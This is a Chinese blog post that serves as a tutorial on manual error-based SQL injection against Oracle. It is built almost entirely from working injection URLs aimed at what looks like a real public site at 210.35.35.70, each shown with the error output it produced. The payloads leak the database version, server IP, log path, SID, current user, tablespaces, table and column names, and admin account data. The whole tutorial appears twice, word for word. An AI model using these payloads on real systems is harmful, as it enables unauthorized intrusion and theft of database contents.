oracle手注
2015-10-09 01:12
344 查看
报错注入:
【1】爆版本号
方法一:
例子:http://210.35.35.70:82/Book.aspx?id=0199332841
爆版本号:http://210.35.35.70:82/Book.aspx?id=0199332841' || utl_inaddr.get_host_name((select banner from v$version where rownum=1)) --
报错信息:ORA-29257: 未知的主机 Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
ORA-06512: 在 "SYS.UTL_INADDR", line 4
ORA-06512: 在 "SYS.UTL_INADDR", line 35
ORA-06512: 在 line 1
方法二:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58))
from sys.v_$version where rownum=1)||chr(62))) from du) --
报错信息:ORA-31011: XML 语法分析失败
ORA-19202: XML 处理
LPX-00110: Warning: 无效的 QName "::Oracle:Database:11g:Enterprise:Edition:Release:11.1.0.7.0:-:Production" (不是名称)
Error at line 1
时出错
ORA-06512: 在 "SYS.XMLTYPE", line 310
ORA-06512: 在 line 1
方法三:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
【2】爆ip:
只有这种方法有效:
http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(select utl_inaddr.get_host_address from dual)) --
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 210.35.35.10 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
类似的:
(1)可以爆日志的位置:
(select member from v$logfile where rownum=1)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 F:\APP\ADMINISTRATOR\ORADATA\ORCL\REDO03.LOG 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(2)可以爆sid:(select instance_name from v$instance)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 orcl 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(3)可以爆当前用户信息:(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 NCHD 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(4)判断是不是dba:(select SYS_CONTEXT ('USERENV', 'ISDBA') from dual)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 FALSE 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
【3】爆表空间(oracle没有数据库这个概念,代替的是:表空间):http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT TABLESPACE_NAME FROM(SELECT DBA_TABLESPACES.TABLESPACE_NAME, ROWNUM AS CON FROM DBA_TABLESPACES WHERE ROWNUM <= 1)WHERE CON >=1)) --
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 SYSTEM 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
PS:想要查其他的表空间,只要把数字改一改就好,比如想查第二个表空间则这么写:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT TABLESPACE_NAME FROM(SELECT DBA_TABLESPACES.TABLESPACE_NAME, ROWNUM AS CON FROM DBA_TABLESPACES WHERE ROWNUM <= 2)WHERE CON >=2)) --
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 SYSAUX 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(Ps:表空间:创建表空间会在物理磁盘上建立一个数据文件,作为数据库对象(用户、表、存储过程等等)的物理存储空间;
用户:创建用户必须为其指定表空间,如果没有显性指定默认表空间,则指定为users表空间;创建用户后,可以在用户上,创建表、存储过程等等其他数据库对象;
表:是数据记录的集合;
创建过程: 表空间--->用户--->表;
所属关系: 表空间 包含 用户 包含 表;)
select default_tablespace, username from dba_user
这个sql指令会查出表空间对应的用户
【4】查表:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 1)WHERE CON >=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 QKDDK_140923 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(Ps:查第二个表就是这么写:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 2)WHERE CON >=2)) –
【5】查 “ZD_DW” 表字段:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT column_name FROM(SELECT user_tab_columns.column_name, ROWNUM AS CON FROM user_tab_columns WHERE ROWNUM <= 1 and table_name='ZD_DW')WHERE CON >=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 F1 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
【6】查数据:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT ADMINS_NAME FROM(SELECT TT_ADMINS.ADMINS_NAME, ROWNUM AS CON FROM TT_ADMINS WHERE ROWNUM <= 1)WHERE CON >=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 TTADMINS 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
附:
ORACLE中查询第n条到第m条的数据记录的方法:
SELECT * FROM
(
SELECT 表名.*, ROWNUM AS CON FROM 表名 WHERE ROWNUM <= M AND 其它查询条件 ORDER BY 排序条件
)
WHERE CON >=N;
【1】爆版本号
方法一:
例子:http://210.35.35.70:82/Book.aspx?id=0199332841
爆版本号:http://210.35.35.70:82/Book.aspx?id=0199332841' || utl_inaddr.get_host_name((select banner from v$version where rownum=1)) --
报错信息:ORA-29257: 未知的主机 Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
ORA-06512: 在 "SYS.UTL_INADDR", line 4
ORA-06512: 在 "SYS.UTL_INADDR", line 35
ORA-06512: 在 line 1
方法二:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=(select upper(XMLType(chr(60)||chr(58)||chr(58)||(select replace(banner,chr(32),chr(58))
from sys.v_$version where rownum=1)||chr(62))) from du) --
报错信息:ORA-31011: XML 语法分析失败
ORA-19202: XML 处理
LPX-00110: Warning: 无效的 QName "::Oracle:Database:11g:Enterprise:Edition:Release:11.1.0.7.0:-:Production" (不是名称)
Error at line 1
时出错
ORA-06512: 在 "SYS.XMLTYPE", line 310
ORA-06512: 在 line 1
方法三:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
【2】爆ip:
只有这种方法有效:
http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(select utl_inaddr.get_host_address from dual)) --
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 210.35.35.10 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
类似的:
(1)可以爆日志的位置:
(select member from v$logfile where rownum=1)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 F:\APP\ADMINISTRATOR\ORADATA\ORCL\REDO03.LOG 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(2)可以爆sid:(select instance_name from v$instance)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 orcl 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(3)可以爆当前用户信息:(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 NCHD 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(4)判断是不是dba:(select SYS_CONTEXT ('USERENV', 'ISDBA') from dual)
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 FALSE 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
【3】爆表空间(oracle没有数据库这个概念,代替的是:表空间):http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT TABLESPACE_NAME FROM(SELECT DBA_TABLESPACES.TABLESPACE_NAME, ROWNUM AS CON FROM DBA_TABLESPACES WHERE ROWNUM <= 1)WHERE CON >=1)) --
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 SYSTEM 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
PS:想要查其他的表空间,只要把数字改一改就好,比如想查第二个表空间则这么写:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT TABLESPACE_NAME FROM(SELECT DBA_TABLESPACES.TABLESPACE_NAME, ROWNUM AS CON FROM DBA_TABLESPACES WHERE ROWNUM <= 2)WHERE CON >=2)) --
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 SYSAUX 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(Ps:表空间:创建表空间会在物理磁盘上建立一个数据文件,作为数据库对象(用户、表、存储过程等等)的物理存储空间;
用户:创建用户必须为其指定表空间,如果没有显性指定默认表空间,则指定为users表空间;创建用户后,可以在用户上,创建表、存储过程等等其他数据库对象;
表:是数据记录的集合;
创建过程: 表空间--->用户--->表;
所属关系: 表空间 包含 用户 包含 表;)
select default_tablespace, username from dba_user
这个sql指令会查出表空间对应的用户
【4】查表:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 1)WHERE CON >=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 QKDDK_140923 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
(Ps:查第二个表就是这么写:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT table_name FROM(SELECT user_tables.table_name, ROWNUM AS CON FROM user_tables WHERE ROWNUM <= 2)WHERE CON >=2)) –
【5】查 “ZD_DW” 表字段:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT column_name FROM(SELECT user_tab_columns.column_name, ROWNUM AS CON FROM user_tab_columns WHERE ROWNUM <= 1 and table_name='ZD_DW')WHERE CON >=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 F1 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
【6】查数据:http://210.35.35.70:82/Book.aspx?id=0199332841' and 1=ctxsys.drithsx.sn(1,(SELECT ADMINS_NAME FROM(SELECT TT_ADMINS.ADMINS_NAME, ROWNUM AS CON FROM TT_ADMINS WHERE ROWNUM <= 1)WHERE CON >=1)) –
报错信息:ORA-20000: Oracle Text 错误:
DRG-11701: 主题词表 TTADMINS 不存在
ORA-06512: 在 "CTXSYS.DRUE", line 160
ORA-06512: 在 "CTXSYS.DRITHSX", line 538
ORA-06512: 在 line 1
附:
ORACLE中查询第n条到第m条的数据记录的方法:
SELECT * FROM
(
SELECT 表名.*, ROWNUM AS CON FROM 表名 WHERE ROWNUM <= M AND 其它查询条件 ORDER BY 排序条件
)
WHERE CON >=N;
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 深入浅析Oracle数据库管理之创建和删除数据库
- Oracle Scott创建视图权限不足解决办法
- Windows环境下在Oracle VM VirtualBOX下克隆虚拟机镜像(克隆和导入)
- oracle索引<转>
- Oracle数据文件管理
- Oracle-卸载
- Oracle-简介
- Oracle-oracleSQL对单表各种查询操作及函数的使用
- 在oracle数据库里创建自增ID字段的步骤
- Oracle数据库报ORA-01078和LRM-00109错误解决方法
- 谈谈oracle中的临时表
- Oracle-在线重定义操作文档
- Oracle 12.1.0.1 RAC + DG搭建
- oracle所有用户都被锁定之后解决办法
- Oracle express启用scott用户
- oracle listener 服务启动后关闭
- oracle的乐观锁和悲观锁
- oracle储存过程,job,视图,触发器(记性不好,写个例子自己记)
- Oracle 过程中的select into 中查询记录数不是1导致异常的解决办法
- Oracle 11g 发行版2 新安装后关于登录的一些基本操作